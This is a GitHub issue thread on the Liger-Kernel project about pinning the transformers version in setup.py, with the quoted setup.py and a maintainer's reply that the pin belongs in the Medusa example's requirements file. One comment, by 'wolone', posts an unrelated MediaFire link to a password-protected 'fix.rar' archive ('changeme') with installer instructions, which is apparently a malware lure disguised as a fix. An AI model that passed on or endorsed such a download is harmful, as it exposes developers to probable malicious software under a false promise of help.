### ISSUE TITLE
[Fix package version in setup.py]

### ISSUE THREAD

**Issue by yushengsu-thu** [linkedin/Liger-Kernel#97]
### 🐛 Describe the bug

When I use the "transformers>4.40.1", I will encounter error `ValueError: Cannot use apply_chat_template() because tokenizer.chat_template is not set and no template argument was passed!` when I run examples/medusa. Thus, assign the specific in setup.py might be better. 
the 

### Reproduce

In setup.py, it's better to assign the specific the packages versions in `install_requires` and `extras_require`. For example, if I use the "transformers>4.40.1", I will encounter error `ValueError: Cannot use apply_chat_template() because tokenizer.chat_template is not set and no template argument was passed!` when I run examples/medusa. Thus, assign the specific in setup.py might be better. 

```
from setuptools import find_namespace_packages, setup

__version__ = "0.1.1"

setup(
    name="liger_kernel",
    version=__version__,
    description="Efficient Triton kernels for LLM Training",
    long_description=open("README.md").read(),
    long_description_content_type="text/markdown",
    license="BSD-2-Clause",
    url="https://github.com/linkedin/Liger-Kernel",
    package_dir={"": "src"},
    packages=find_namespace_packages(where="src"),
    classifiers=[
        "Development Status :: 4 - Beta",
        "Intended Audience :: Developers",
        "Intended Audience :: Science/Research",
        "Intended Audience :: Education",
        "License :: OSI Approved :: BSD License",
        "Programming Language :: Python :: 3",
        "Programming Language :: Python :: 3.8",
        "Programming Language :: Python :: 3.9",
        "Programming Language :: Python :: 3.10",
        "Topic :: Software Development :: Libraries",
        "Topic :: Scientific/Engineering :: Artificial Intelligence",
    ],
    keywords="triton,kernels,LLM training,deep learning,Hugging Face,PyTorch,GPU optimization",
    include_package_data=True,
    install_requires=[
        "torch>=2.1.2",
        "triton>=2.3.0",
        "transformers==4.40.1",
    ],
    extras_require={
        "dev": [
            "matplotlib>=3.7.2",
            "flake8>=4.0.1.1",
            "black>=24.4.2",
            "isort>=5.13.2",
            "pytest>=7.1.2",
            "datasets>=2.19.2",
        ]
    },
)
```

### Versions

In setup.py, it's better to use the same pks as in dev.

**Comment by wolone** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by ByronHsu** [comment]
this is not good. we should specify the version in req.txt of medusa instead https://github.com/linkedin/Liger-Kernel/blob/main/examples/medusa/requirements.txt. Thanks! cc @JasonZhu1313
